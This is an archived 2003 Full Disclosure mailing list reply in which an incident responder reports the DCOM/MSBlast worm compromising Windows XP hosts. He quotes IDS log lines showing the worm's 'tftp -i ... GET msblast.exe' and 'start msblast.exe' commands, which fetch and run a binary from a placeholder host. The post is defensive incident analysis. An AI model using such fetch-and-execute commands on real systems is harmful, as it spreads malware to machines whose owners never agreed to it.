Full Disclosure mailing list archives

Re: DCOM Worm?

From: Jordan Wiens <jwiens () nersp nerdc ufl edu>
Date: Mon, 11 Aug 2003 19:29:05 -0400 (EDT)

On Mon, 11 Aug 2003, Carl Sager wrote:

Aha!  The worm is using the 2k offsets and corrupts
the DCOM RPC service on XP, which makes the OS
automatically shut down after 1 minute.  Patch up or
use a firewall (or well, just tell any ignorant end
users to do so) and you'll be good!


You sure about that?  I'm seeing it compromise XP hosts as well.  Maybe it
randomly switches between offsets?

In fact, IDS logs from our first compromised host:

Microsoft Windows XP [Version 5.1.2600]Microsoft Windows XP [Version
5.1.2600]tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
{D}{A}
(C) Copyright 1985-2001 Microsoft Corp.{D}{A}
{D}{A}
C:\WINDOWS\System32>tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
{D}{A}
(C) Copyright 1985-2001 Microsoft Corp.{D}{A}
{D}{A}
C:\WINDOWS\System32>tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
start msblast.exe{A}
start msblast.exe{A}
msblast.exe{A}
msblast.exe{A}



-- 
Jordan Wiens, CISSP
UF Network Incident Response Team
(352)392-2061


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

DCOM Worm? Carl Sager (Aug 11)
- Re: DCOM Worm? Daniel Harrison (Aug 11)
  - Re: DCOM Worm? Tobias Heide (Aug 11)
- Re: DCOM Worm? morning_wood (Aug 11)
- <Possible follow-ups>
- RE: DCOM Worm? Matt Bell (Aug 11)
- DCOM Worm? Carl Sager (Aug 11)
  - Re: DCOM Worm? Jordan Wiens (Aug 11)
    - Re: DCOM Worm? Carl Sager (Aug 11)
- RE: DCOM Worm? p00lshark (Aug 11)